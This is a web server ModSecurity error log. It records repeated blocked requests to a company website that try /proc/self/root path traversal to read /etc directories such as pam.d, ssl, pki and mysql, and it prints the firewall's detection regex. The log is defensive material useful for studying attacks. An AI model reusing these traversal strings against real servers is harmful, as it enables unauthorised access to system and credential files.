[Tue Mar 17 11:29:10.418553 2026] [:error] [pid 9155:tid 140411683178240] [client 74.7.243.203:53120] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllNtbI7zhHXcabyMUxOQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:12.688437 2026] [:error] [pid 11293:tid 140411658000128] [client 74.7.243.203:53122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllONCmCSWTlPouqorXWgAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:14.013405 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.243.203:53126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllOr-sgTmmJoPuMdyp2gAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:15.201041 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.243.203:53138] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllO9CmCSWTlPouqorXWwAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:16.504838 2026] [:error] [pid 11293:tid 140411565680384] [client 74.7.243.203:53148] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllPNCmCSWTlPouqorXXQAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:17.695104 2026] [:error] [pid 17965:tid 140411658000128] [client 74.7.243.203:53150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllPat8Nd0UC_OcbVG7GgAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:19.860758 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.243.203:53154] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllP6BJNF7axNlVR0UH6AAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:21.138217 2026] [:error] [pid 17965:tid 140411641214720] [client 74.7.243.203:49186] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllQat8Nd0UC_OcbVG7GwAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:22.299194 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.203:49188] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllQtY0UrI5A3LftIztswAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:26.760588 2026] [:error] [pid 17965:tid 140411649607424] [client 74.7.243.203:49190] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllRqt8Nd0UC_OcbVG7IQAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:28.066923 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.203:49200] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllSNY0UrI5A3LftIzttAAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:29.229707 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.203:49214] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllSdY0UrI5A3LftIzttQAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:31.499317 2026] [:error] [pid 17965:tid 140411733534464] [client 74.7.243.203:48866] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllS6t8Nd0UC_OcbVG7IwAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:37.194593 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.243.203:48880] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllUQeiSKl8TjouI-YNAAAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:42.479951 2026] [:error] [pid 9155:tid 140411582465792] [client 74.7.241.46:46302] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllVtbI7zhHXcabyMUxbgAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:44.999911 2026] [:error] [pid 18709:tid 140411607643904] [client 74.7.243.203:48894] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllWDarLhPAjZGI1b25twAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:47.436883 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.243.203:56068] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllW64xEDsg_V3ESNY-kgAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:29:57.396327 2026] [:error] [pid 1016:tid 140411641214720] [client 74.7.243.203:56080] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllZZqmL8PQht4WJFlTfQAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:30:04.871755 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.243.203:33510] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abllbKBJNF7axNlVR0UH8QAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:30:14.100241 2026] [:error] [pid 9155:tid 140411725141760] [client 74.7.243.203:59378] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablldtbI7zhHXcabyMUxiwAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:30:15.415573 2026] [:error] [pid 9155:tid 140411641214720] [client 74.7.243.203:39968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablld9bI7zhHXcabyMUxjQAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:30:17.121863 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.244.31:35320] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablleQeiSKl8TjouI-YNBgAAA8U"]
